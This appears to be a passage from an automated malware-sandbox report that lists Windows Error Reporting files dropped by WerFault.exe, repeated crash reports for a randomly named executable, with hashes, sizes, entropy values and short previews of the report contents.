                                                                                                                                                                                                                  SHA-512:866B9698591385BFB4C22951FEF7531F3EF574C52B5E68AD68AEDA5FE8C75263A294B2C804020B59F72600A4A29132A726F5AF3E6911E5563CCF0F2AFC27D984
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.8.0.6.3.6.6.4.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.8.1.3.3.9.7.6.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.6.1.6.3.1.d.-.a.1.4.a.-.4.5.3.9.-.9.8.d.3.-.5.5.c.f.c.8.d.2.8.e.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.b.a.2.1.3.1.-.0.7.a.b.-.4.6.0.3.-.a.e.d.e.-.9.a.e.c.4.9.3.6.0.e.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.3.8.-.0.0.0.1.-.0.0.1.5.-.4.6.f.b.-.3.d.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263196662857732
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:wtz9L1eAIMJAw0BU/n555KjRJdqTzuiFV9Z24IO8U85S:onzJ0BU/gjPyzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:4424C9607F17ABC60D2267231A3A8AA4
                                                                                                                                                                                                                  SHA1:268230E162038FB75B072ADAC4C6F7407CECD744
                                                                                                                                                                                                                  SHA-256:75B6791BD987839570A3A624475EEDEABF18932E0C8C4C19064855D0F3C3CC3E
                                                                                                                                                                                                                  SHA-512:2EB661B9C51B5A2D5722B8C96DAA9A4CEB88DDD5E2568C3C126D975781D9681CFCD7298ACD7B4F8EFADB9B34F062878840E730A4BB7F0574AED334DABF2B345F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.9.6.7.4.0.8.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.0.8.7.7.2.0.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.d.1.1.1.c.9.-.9.b.2.a.-.4.a.8.c.-.b.7.5.d.-.6.b.9.4.5.9.1.8.2.a.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.d.8.3.0.a.3.-.6.e.d.5.-.4.4.2.e.-.a.3.c.7.-.4.3.2.6.6.6.e.1.a.2.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.4.-.0.0.0.1.-.0.0.1.5.-.2.b.d.9.-.4.9.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263640630408497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:LG581eAIMgAw0BU/n555KjRJdSTzuiFV9Z24IO8U85SU:iYzg0BU/gjPKzuiFXY4IO8OU
                                                                                                                                                                                                                  MD5:42291B5467D24A1F39F89583A88226BD
                                                                                                                                                                                                                  SHA1:DEFDEB39336406D879BDAE25C8A6AED25A908D20
                                                                                                                                                                                                                  SHA-256:48368753B1BF8C413DCDA5763A49E209F52E223AB8064F4A8D2FD2CF7A9C6C70
                                                                                                                                                                                                                  SHA-512:1DF926F1D063575D30815C91EE9EFB9B4D0A6D947539CE171C881814EEEAB263E8A7CCEA276F8E4EA01DBAC8CA4DCDAFEB5CE0291733992F8B37218C2DF96AAF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.0.9.7.0.8.9.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.3.3.4.5.8.9.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.c.b.f.e.9.3.-.2.8.4.9.-.4.a.d.4.-.b.d.f.2.-.1.1.2.3.f.b.a.6.a.4.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.0.c.2.7.3.1.-.b.6.7.9.-.4.2.7.3.-.9.8.4.e.-.2.c.c.2.c.c.6.a.c.8.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.0.8.-.0.0.0.1.-.0.0.1.5.-.8.d.d.a.-.4.6.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0266432012868925
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:LJae1eAIM9Aw0BU/n555KjRJd6TzuiFV9Z24IO8U85S:tz90BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:913F67D9CC0F7079186633B5CBC7645C
                                                                                                                                                                                                                  SHA1:5444A280E6B2465037E3989BAE1B923215EF6FC3
                                                                                                                                                                                                                  SHA-256:7A6E08229EFF5C5F91D9F42DB8A8123176E92A11E783884E0CDC6CD1D07F8B6E
                                                                                                                                                                                                                  SHA-512:96A57DA619C90FE33FD65C01C396B8A838787ED9C3510EEA9679F4FC7DF6DEB4ACCABF9B40C814332CADE3DDAF66B63A456BD41D4B0DBBECCAB27F6DF305CDB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.3.2.7.4.6.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.6.8.0.5.8.7.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.a.6.2.f.5.b.-.6.f.3.6.-.4.c.1.2.-.9.4.b.1.-.6.5.b.4.0.0.d.a.3.b.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.5.b.4.8.f.f.-.5.3.7.7.-.4.1.f.9.-.8.d.b.f.-.a.c.a.1.1.c.8.6.7.0.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.5.-.c.b.d.7.-.5.0.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0264033868549116
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ygghi1eAIMhAw0BU/n555KjRJd6TzuiFV9Z24IO8U85S0:SWzh0BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:7AD3E09D0801127C325EFE40103CDC0E
                                                                                                                                                                                                                  SHA1:9CF76CFC77539D76FF7C3A41C857C0ED7EAAD017
                                                                                                                                                                                                                  SHA-256:173B004CF0FAB7A882505E43BB8000AC784A46B302FAF9026B0E8E2D3929E7BF
                                                                                                                                                                                                                  SHA-512:C05FC3FAEAA1D766EF7C9C773A3F8B7B4AAB20A97A5213EB324323D036C534F677325E17ED2ADB8FF5669C8285E73EEC54BAD1E4D5EC47534426C8F94A5454D3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.026726200916177
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:gUb1eAIMOAw0BU/n555KjRJd6TzuiFGZ24IO8U85SR:HzO0BU/gjPCzuiFGY4IO8O
                                                                                                                                                                                                                  MD5:C8453E01694A528C2CD6D237C557D3ED
                                                                                                                                                                                                                  SHA1:43E10F51C142B7073929745672215C60E425894C
                                                                                                                                                                                                                  SHA-256:F9FBC163789CF995ABE4672CBBD5AC4E9613E7CDCCC191E736ECFC2C142299BD
                                                                                                                                                                                                                  SHA-512:89A4A2164C47579D18E1B418F11965E3314942487FBA73034D3EEB4CB4C093C9684FDE3EA9F00538A4E9322435AD8C4E8DC54C1E6540812CDC984AC521F3BA69
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0264168793242494
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:PA+b1eAIMzAw0BU/n555KjRJd6TzuiFV9Z24IO8U85S:pJzz0BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:913A07147E78FC8C6992AD8E38F453B6
                                                                                                                                                                                                                  SHA1:EC90529ED7843067092B459FFB60093F468DE149
                                                                                                                                                                                                                  SHA-256:17A719FF9FCDF2BB83A9C9F6E442000472DA8EA8B94AFABCA99443AAC20B2D3D
                                                                                                                                                                                                                  SHA-512:1DE75B502CED6CF4401A673191D53CFD4073D9B4F009CA137A267C88E5C2609523566196EE241655B56638791F6565015C063347CAB586050DCE72851C8C0E24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0260564046548317
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Wxp1eAIMNAw0BU/n555KjRJdSTzuiFV9Z24IO8U85S:QzN0BU/gjPKzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:A9401B9A81206013078EC5DD199C2230
                                                                                                                                                                                                                  SHA1:B538858BCB511CC0C51D279CB638D24D83EB0236
                                                                                                                                                                                                                  SHA-256:33D41E54EBFC66288619538D8BDAA9158E4A3CD08B0312AB9E186BDF0F9B83B6
                                                                                                                                                                                                                  SHA-512:990F9FEC42699DE0B9469FD5DA7948C9526C52095ED64C2A25557315B85524D1F8F98AEE8C3F090E131BEF3F8CC4F1A60E09E6FEEBB881FC6EA9A3A15305DFEB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263187127252367
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:KcZ1eAIMlAw0BU/n555KjRJd6TzuiFV9Z24IO8U85Sk:zzl0BU/gjPCzuiFXY4IO8Ok
                                                                                                                                                                                                                  MD5:3E0EB7002E19A244A1F910345E270613
                                                                                                                                                                                                                  SHA1:2DABCC233AFD62BAA570A2BB37595F0F69BB5EC6
                                                                                                                                                                                                                  SHA-256:7390B095DD0B6C297F4D2022AE273073CE5B820E4EEEFCAE9E14B1E7352003FB
                                                                                                                                                                                                                  SHA-512:2245D1DFCCC8CA401CB0690EFD3B0F2C9E3949F9A803DA403DF3ED277485CFAADE86E5E9CD8E0C29AC7E35C84703C1125A4E0D2307BC6BD69016B185B43C7E17
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8442
                                                                                                                                                                                                                  Entropy (8bit):3.7138145799843034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJjR96U6Y2D5SU9wgmf+KLprRG89bSEsfWdGm:R6lXJ/6U6YUSU9wgmf9nPS3f4
                                                                                                                                                                                                                  MD5:5AD8648C5D05298360A10E0460ABE5DF
                                                                                                                                                                                                                  SHA1:919A10A8B79DCD3E13BEF96586D1D9CFC4688E5D
                                                                                                                                                                                                                  SHA-256:7718A1D65C5BF096E2D6934A59B13D3775F688DF5252684F3E9A65FD45A05A7C
                                                                                                                                                                                                                  SHA-512:6EC9BD11C150D02764EECCAD531022889D27335603AB78F16753E0AB33DBBC1AB7227CB8BB1A1B626461742AF951E6DAF032997B8ED3B10F828078088FCB0A52
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.601731616735406
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYO8Ym8M4Jw1GFB+q8rCFMTmsd:uIjfZI77P7VNJwkPmTmsd
                                                                                                                                                                                                                  MD5:20A2BB451F5A9EFC27781BFE8153765E
                                                                                                                                                                                                                  SHA1:603D746EF86D5A94FBD08721F096A9E0FE6C4867
                                                                                                                                                                                                                  SHA-256:729E20719808F0B9F48EF25229E0859A1C7B5ACC4941E0E7B6E11F0DCB855CA9
                                                                                                                                                                                                                  SHA-512:100C6D477F7B3A0706AAA01A38E14E1C4F18C5D162967E5A3FFF25372D98427AF85EE2B971DA73CB61AC8FD6302701643CDE74765C9E0E2C39BA004648971986
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.712694264492118
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ0RN6EXB+D6Y2DRSU9Ngmf+KLpry89bS0sfT9Gm:R6lXJw6B6YcSU9Ngmf9NSnfh
                                                                                                                                                                                                                  MD5:37199D195A6429D7FD7DD26C46C3513E
                                                                                                                                                                                                                  SHA1:90C3BCBC0067C76A8F5549DA456987B86DD1D2DE
                                                                                                                                                                                                                  SHA-256:16813703EE48C7983F84011630E727AD63D2B3E4C1A3E314576B48E56EFE5939
                                                                                                                                                                                                                  SHA-512:6438BEB230259CECCF5FB2E0C13C82CA815D0939FC1F85248ADBEE0BE7E0D2AA3CE869A9D3D362FB0CD0591A06C06E8636B9295F9163B7BD8A44F74248DAB3E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.600078484550648
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYO4Ym8M4Jw1GFL+q8rKFMTm3d:uIjfZI77P7VBJw2PmTm3d
                                                                                                                                                                                                                  MD5:82B715B27AF88E6FC58B301E83E7D1D7
                                                                                                                                                                                                                  SHA1:C558C7A6AE2A770DB789D927E1DF3E8CD6E98DE7
                                                                                                                                                                                                                  SHA-256:DF9E5BD5B663509BEA3CCB75FFA6B16BB19FA1DA67F754EB946C51B47382BCEA
                                                                                                                                                                                                                  SHA-512:9F874DE6EBD9109724FCB1C703AC894138EE1C38959CEA8395647D851C38B87773B089F7274F1CBD11926B6B6A4806A3717D99AAF794522A0A5AD8F60299099F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8446
                                                                                                                                                                                                                  Entropy (8bit):3.715405769269068
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ/RC68Po6Y2D5SU9Cgmf+KLpruq89bnbxsf/Njm:R6lXJc6r6YESU9Cgmf9MnbqfV6
                                                                                                                                                                                                                  MD5:79AA07BAFEAA5F67A541B46620497B76
                                                                                                                                                                                                                  SHA1:B7EB5496C738DFB6E1A28AB482584BD4D40446FF
                                                                                                                                                                                                                  SHA-256:A4FB5C00BF4AFFBF870524845AA3993D8893F581E4C84578DAFDCF1A223ACA90
                                                                                                                                                                                                                  SHA-512:CD5647E73779EF48F18873AD97F96DD9076C9CDD52C449059297B4B9B8F9604BDBEDEF41B9C382819F0C5B05D17436D024403C1BBCFBA1A7D8DC74250CA80F74
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3472</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.598687794629058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYGYm8M4Jw1GF6Y+q8rR5FMTmdd:uIjfZI77P7VyJw+I5mTmdd
                                                                                                                                                                                                                  MD5:151634FD23F84E0AF6C706E0E7639108
                                                                                                                                                                                                                  SHA1:D7182F1936F1652F4D8541C243DACE5136406863
                                                                                                                                                                                                                  SHA-256:8A6FB3309C20BA062859BAFE1D0C43CBD3BB081329DA2882A25B3D457C6B0436
                                                                                                                                                                                                                  SHA-512:A0AD171172E99C19F9CD3A21DB844E2B48008D262809D76936227C279B2244FA86D58038842AC2A86316B0552C3F437D5BBEDAE51C5CFFABB5842703DBCFAE80
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:09 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):854408
                                                                                                                                                                                                                  Entropy (8bit):1.6810731540591572
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:LFlPm9go9q3j9mXoGc91nazq+LlmDggKNBBp:LFleK6OoXoGcagUF
                                                                                                                                                                                                                  MD5:2EE501E2262B63096F043F91366D39C0
                                                                                                                                                                                                                  SHA1:0BD4CA59060AD6E29F9B207A369AA82079E9B772
                                                                                                                                                                                                                  SHA-256:47382ECFA445E321AD59F9B589C4C6B17A7FA8CA11D64B004C2177FA049FB589
                                                                                                                                                                                                                  SHA-512:962A67F29FFEAE1C248FBD0D957645D54D70D3E5B7283A47C3825BD9EDA39CEC029E27129EE47BDEE42964091F4FDAF86F673CB259557688CD921EEA4AF4658D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8442
                                                                                                                                                                                                                  Entropy (8bit):3.713533511256963
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJnR76B6Y2DSSU9wPgmf+KLprN89b1bsfJnm:R6lXJd6B6YfSU9ggmf981gfk
                                                                                                                                                                                                                  MD5:1EC16D573D584E64FDDAD1B053C4BB45
                                                                                                                                                                                                                  SHA1:92343E76E6E29A334796A5B39F68CAFD4FF080BC
                                                                                                                                                                                                                  SHA-256:845AE2E4BFF58341CCB6F08FAFEE1B1B8AEA53D4C693CC6646B843D23AAF747E
                                                                                                                                                                                                                  SHA-512:D447D82794B77C2BD45F8A071F2AF2CE1D4D5CDBC6F61415AF057E253B0A29CF37020E7EC2EC3FCB695355E8974F7D4A21FE4498B1911CCEFEBFADFC5422FF35
                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6628</Pi
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.5997900855427005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VY5Ym8M4Jw1GFN+q8rgmFMTmTd:uIjfZI77P7VJJwc3mmTmTd
                                                                                                                                                                                                                  MD5:57D8493C29FBEE1A027EB81C2DD93C5C
                                                                                                                                                                                                                  SHA1:7FF4A13EAA76FD3187151BE3C3859B167BDA0825
                                                                                                                                                                                                                  SHA-256:FCD75C5E01B339E6C0F6B7575FB7AAE8DD8BED9B3E09C07B9F4CDB411ACBB05E
                                                                                                                                                                                                                  SHA-512:8A7FE00DDC50B624504967AD7DAD5C3A71154999FAE6678BCBE66ABD80D0A94608061D7E9F67A0813B801765E71C1BFA086C537FB7BA9B671E8BBB6EC203E1F3
                                                                                                                                                                                                                  Malicious:false
